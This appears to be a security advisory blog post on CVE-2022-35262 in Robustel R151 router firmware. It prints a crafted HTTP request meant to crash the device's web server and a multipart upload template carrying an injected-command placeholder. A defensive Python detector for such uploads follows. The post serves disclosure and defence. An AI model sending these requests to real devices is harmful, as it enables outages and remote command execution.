A critical security vulnerability (CVE-2022-35262) has been identified in the web_server hashFirst functionality of Robustel R151 firmware (versions 3.1.16 and 3.3.). This denial-of-service (DoS) vulnerability allows an attacker to crash the device by sending a specially-crafted sequence of network requests. Additionally, the /action/import_xml_file/ API is affected by a command injection vulnerability. In this post, we discuss the details of the exploit, provide code snippets, and share links to the original references for further information.

Vulnerability Details

The web server hashFirst functionality of the affected Robustel R151 firmware versions (3.1.16 and 3.3.) suffers from a DoS vulnerability. An attacker can exploit it by sending a sequence of network requests to the target device, causing the device to crash. The /action/import_xml_file/ API within the web server is also susceptible to command injection, allowing an attacker to execute unwanted commands remotely.

To exploit the DoS vulnerability, an attacker can send the following specially-crafted HTTP request:

GET /hashFirst?sort=undefined&order=*&search= HTTP/1.1
Host: <TARGET_IP>
Referer: http://<TARGET_IP>/cgi/login/?key=badvalue
Connection: close

For the command injection vulnerability in the /action/import_xml_file/ API, an attacker can send the following HTTP request:

POST /action/import_xml_file/ HTTP/1.1
Host: <TARGET_IP>
Content-Type: multipart/form-data; boundary=-=-=-=48594949=-=-=-098764310988
Content-Length: <CONTENT_LENGTH>
Connection: close

---=-=-=48594949=-=-=-098764310988
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: text/plain

";<MALICIOUS_COMMAND>#"---=-=-=48594949=-=-=-098764310988--

Replace <TARGET_IP> with the IP address of the target device, and <MALICIOUS_COMMAND> with the unwanted command to be executed. Note that <CONTENT_LENGTH> should be replaced with the appropriate content length.
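
A defensive check for the import request shown above, as an added example that is not from the original post or from Robustel: a Python function that a reverse proxy or IDS hook could run over a raw request to flag uploads to /action/import_xml_file/ whose content is not XML-like or carries shell metacharacters. The function names, the device.example host, the metacharacter heuristic, and the assumption that legitimate imports are XML documents are this example's own.

```python
import re

IMPORT_PATH = "/action/import_xml_file/"   # endpoint named on the page
BOUNDARY = re.compile(r'boundary="?([^";]+)"?', re.I)
ENTITY = re.compile(rb"&#?\w+;")           # XML entity references such as &amp;
# Heuristic chosen for this example: shell separators and substitutions.
SHELL_META = re.compile(rb"[;|&`]|\$\(")


def inspect_import_upload(raw: bytes) -> list:
    """Return findings for one raw HTTP/1.1 request; [] means nothing flagged."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    try:
        method, target, _version = lines[0].split(" ", 2)
    except ValueError:
        return ["malformed request line"]
    if method != "POST" or target.split("?", 1)[0] != IMPORT_PATH:
        return []
    headers = {k.strip().lower(): v.strip()
               for k, _, v in (line.partition(":") for line in lines[1:])}
    m = BOUNDARY.search(headers.get("content-type", ""))
    if not m:
        return ["import request without a multipart boundary"]
    delim = b"--" + m.group(1).encode("latin-1")
    findings = []
    # split() instead of line-anchored matching: a closing delimiter that runs
    # on from the payload, as in the page's sample, is still recognised.
    for part in body.split(delim)[1:]:
        if part.strip() in (b"", b"--"):
            continue                        # closing delimiter / trailing CRLF
        content = part.partition(b"\r\n\r\n")[2].strip()
        # Assumption: legitimate imports are XML documents.
        if not content.startswith(b"<"):
            findings.append("upload does not look like XML")
        if SHELL_META.search(ENTITY.sub(b"", content)):
            findings.append("shell metacharacters in upload content")
    return findings


def sample_request(content: bytes) -> bytes:
    """Constructed sample: the page's POST with a placeholder host."""
    bnd = b"-=-=-=48594949=-=-=-098764310988"
    return (b"POST /action/import_xml_file/ HTTP/1.1\r\nHost: device.example\r\n"
            b"Content-Type: multipart/form-data; boundary=" + bnd + b"\r\n\r\n"
            b"--" + bnd + b'\r\nContent-Disposition: form-data; name="file"; '
            b'filename="test.txt"\r\nContent-Type: text/plain\r\n\r\n'
            + content + b"--" + bnd + b"--\r\n")
```

Entity references are stripped before the metacharacter match so that ordinary XML such as `R&amp;D` is not flagged; a hit is a reason to block or review the request, not proof of compromise.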

For more information on this vulnerability, you can refer to the following resources:

1. CVE-2022-35262 vulnerability details on MITRE's website: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35262
2. Exploit details on Exploit Database, including additional information and code snippets: https://www.exploit-db.com/exploits/52529

Conclusion

The CVE-2022-35262 vulnerability present in Robustel R151's web_server hashFirst functionality poses a significant risk to affected devices. To protect your devices from these threats, it's critical to keep firmware up to date and apply the necessary security patches once available. Being aware of potential vulnerabilities and addressing them appropriately can help ensure the security and integrity of your network infrastructure.

Timeline

Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/26/2022 03:56:00 UTC